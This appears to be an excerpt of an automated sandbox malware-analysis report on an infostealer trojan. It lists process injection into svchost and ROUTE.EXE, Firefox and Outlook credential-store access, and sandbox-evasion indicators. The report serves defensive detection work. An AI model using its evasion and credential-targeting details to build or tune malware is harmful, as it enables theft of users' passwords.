                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0334DAC66_2_0334DAC6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033359106_2_03335910
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A99506_2_032A9950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BB9506_2_032BB950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0330D8006_2_0330D800
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A38E06_2_032A38E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FF096_2_0335FF09
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FFB16_2_0335FFB1
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A1F926_2_032A1F92
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03263FD56_2_03263FD5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03263FD26_2_03263FD2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A9EB06_2_032A9EB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03357D736_2_03357D73
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A3D406_2_032A3D40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03351D5A6_2_03351D5A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BFDC06_2_032BFDC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03319C326_2_03319C32
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FCF26_2_0335FCF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA22206_2_02AA2220
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02ABC0906_2_02ABC090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9B2E06_2_02A9B2E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9D3006_2_02A9D300
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9D0E06_2_02A9D0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9D0DA6_2_02A9D0DA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9B4306_2_02A9B430
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02A9B4356_2_02A9B435
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA3AEB6_2_02AA3AEB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA3AF06_2_02AA3AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AA58E06_2_02AA58E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315E3046_2_0315E304
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315E7C46_2_0315E7C4
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315E4236_2_0315E423
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315CB536_2_0315CB53
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315CAE86_2_0315CAE8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0315D8886_2_0315D888
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: String function: 00D90A30 appears 46 times
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: String function: 00D8F9F2 appears 31 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0331F290 appears 103 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 032D5130 appears 58 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0330EA12 appears 86 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0328B970 appears 262 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 032E7E54 appears 107 times
                Source: qlG7x91YXH.exe, 00000000.00000003.1795370593.0000000003C4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs qlG7x91YXH.exe
                Source: qlG7x91YXH.exe, 00000000.00000003.1793473299.0000000003AA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs qlG7x91YXH.exe
                Source: qlG7x91YXH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@5/4
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE37B5 GetLastError,FormatMessageW,0_2_00DE37B5
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD10BF AdjustTokenPrivileges,CloseHandle,0_2_00DD10BF
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00DD16C3
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DE51CD
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DFA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DFA67C
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DE648E
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D742A2
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeFile created: C:\Users\user\AppData\Local\Temp\aut9D99.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ROUTE.EXE, 00000006.00000003.2459468023.0000000002E52000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002E52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: qlG7x91YXH.exeVirustotal: Detection: 76%
                Source: qlG7x91YXH.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\qlG7x91YXH.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"Jump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: route.pdb source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sUcUmdUxGfN.exe, 00000005.00000000.2188712734.00000000008AE000.00000002.00000001.01000000.00000005.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3014341923.00000000008AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D90A76 push ecx; ret 0_2_00D90A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415ED3 push ebx; iretd 1_2_00416003
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004149FF push cs; iretd 1_2_00414A15
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031B0 push eax; ret 1_2_004031B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415AC5 push esi; retf 1_2_00415AC9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183BF push ebx; ret 1_2_004183C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415C9E push eax; iretd 1_2_00415CA2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411D0F push cs; iretd 1_2_00411D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414DF9 push FFFFFFB4h; retf 1_2_00414DFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E22 push esp; ret 1_2_00411E23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004016FF push edi; ret 1_2_00401701
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041468B push ecx; ret 1_2_0041468C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040171C push ss; ret 1_2_00401723
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415F38 push ebx; iretd 1_2_00416003
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418FDC push edx; iretd 1_2_00418FDD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0283D push eax; iretd 1_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01368 push eax; iretd 1_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01065 push edi; ret 1_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D24EC push ebx; ret 5_2_049D24F4
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CEDB0 push FFFFFFB4h; retf 5_2_049CEF2A
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CFDCB push eax; iretd 5_2_049CFDCF
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CEEAC push FFFFFFB4h; retf 5_2_049CEF2A
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CBE3C push cs; iretd 5_2_049CBE3D
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CBF4F push esp; ret 5_2_049CBF50
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D50EE push cs; retf 5_2_049D50F5
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D3109 push edx; iretd 5_2_049D310A
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CFBF2 push esi; retf 5_2_049CFBF6
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Hooking and other Techniques for Hiding and Protection

                barindex
                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D8F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00D8F98E
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E01C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E01C41
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98090
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeAPI/Special instruction interceptor: Address: 1044474
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: qlG7x91YXH.exe, 00000000.00000003.1786183702.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1762193671.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1761803127.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1761078079.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1762693377.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1766408419.000000000104E000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1761004458.0000000001036000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000002.1797172399.0000000001045000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1779931363.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1762539963.000000000104E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\ROUTE.EXEWindow / User API: threadDelayed 4431Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEWindow / User API: threadDelayed 5541Jump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep count: 4431 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep time: -8862000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep count: 5541 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 8052Thread sleep time: -11082000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDBBE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE68EE FindFirstFileW,FindClose,0_2_00DE68EE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE698F
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD076
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD3A9
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9642
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE979D
